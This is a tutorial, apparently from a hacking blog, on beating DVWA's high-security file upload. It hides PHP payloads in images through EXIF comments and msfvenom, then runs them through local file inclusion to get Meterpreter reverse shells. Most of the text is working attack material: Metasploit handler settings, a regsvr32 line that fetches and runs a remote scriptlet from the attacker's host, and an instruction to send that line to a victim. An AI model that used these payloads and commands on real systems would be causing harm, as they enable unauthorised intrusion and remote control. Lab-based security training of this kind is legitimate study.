In this article you will learn how to bypass
file uploading vulnerability in high security through FILE INCLUSION
vulnerability. As well as how to bypass local file inclusion to get reverse
connection of victim’s Pc.
Attacker: kali
Linux
Target: DVWA
First
you need to download Exif Piot tool
from here.
This is a GUI tool for windows users which allow adding exif data and Meta data
inside a JPEG, PNG and GIF images.
Now
open exif pilot and insert any image to hide malicious
comment inside it; from screenshot you can see I have choose shell.png image and then click on EDIT EXIF/IPTC.
Further inside comment text field type as malicious code and click on ok.
Here
the exif data has been edited successfully inside the image. This tool replaces
the malicious image from the original image in the same folder and sent the
original image into recycle bin.
Now
explore target IP in browser and login into DVWA with admin: password as credential. Set security level high.
Choose
vulnerability file upload to upload
the malicious image in the web server application and now browse your malicious image shell.png
then click on upload.
It will show the path of uploaded image copy the highlighted
path.
Now open the copied path in browser where you will find the
uploaded image.
In
order to execute the malicious code we need to change the category of
vulnerability as well as security level also so that we can execute the hidden comment
inside the image.
Now
set security level low.
In
order to bypass file uploading vulnerability in high security of DVWA we need
to set other vulnerability and I have select
File Inclusion for this purpose.
File
Inclusion allow users to execute any file through URL as I have described
above.
Now past the above copied path of uploaded image inside
the URL as shown in screenshot.
Here
it has given warning system (): cannot
execute blank command which means we need to add some command for execution
hence through URL we will be able to execute any command.
Here
I try to check network configuration of victim’s Pc and you can see the result
of network configuration from screenshot.
Here you can view the directories which I have got by
executing dir command in URL.
Now next I will try to achieve meterpreter session using
Kali Linux
Type msfconsole
and load metasploit framework.
use
exploit/windows/misc/regsvr32_applocker_bypass_server
msf
exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf
exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf
exploit(regsvr32_applocker_bypass_server) > exploit
regsvr32 /s /n /u
/i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll
Copy the above
malicious code and send it to victim.
Here paste above .dll
malicious code inside the URL and when you will run the code in the
browser; attack will get victim’s meterpreter session on his kali Linux.
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32
/s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll
Meterpreter
session 1 will get open
Meterpreter>sysinfo
Second Way
In
second part we will try to combine a malicious PHP file with an image, further
use that malicious image for uploading in web application server and then
bypass that image in same manner as performed above.
Here
first you need to download any .png/.jpg/.gif image and save it on Desktop. Inside Kali Linux I have downloaded an image and save it
with the name “a.png” on the
desktop. Now open the terminal and type following command to generate a PHP code inside “a.png” image.
Msfvenom –p
php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >>
/root/Desktop/a.png
Let’s verify whether the image contains the malicious
code inside it or not
Cat
/root/Desktop/a.png
When
you will scroll down the window screen, here you will find that the end part of
image contains PHP code. It means we have successfully created the malicious
image which ready to upload inside the web application server.
Now
repeat the above process to upload the file inside DVWA with security level high. From given
screenshot you can see my “a.png”
image is successfully uploaded
inside the web server.
Copy the
highlighted path where image is
uploaded.
Before executing image in web server start multi/handler in background inside the kali Linux
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) >exploit
Again
set security level low in DVWA and turn on the File Inclusion vulnerability
and repeat the same process as above, now the paste the above copied path
of uploaded image inside the URL and
execute it which will provides reverse connection on kali Linux.
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/a.png
meterpreter > sysinfo
I have got meterpreter session of victim PC
0 comments:
Post a Comment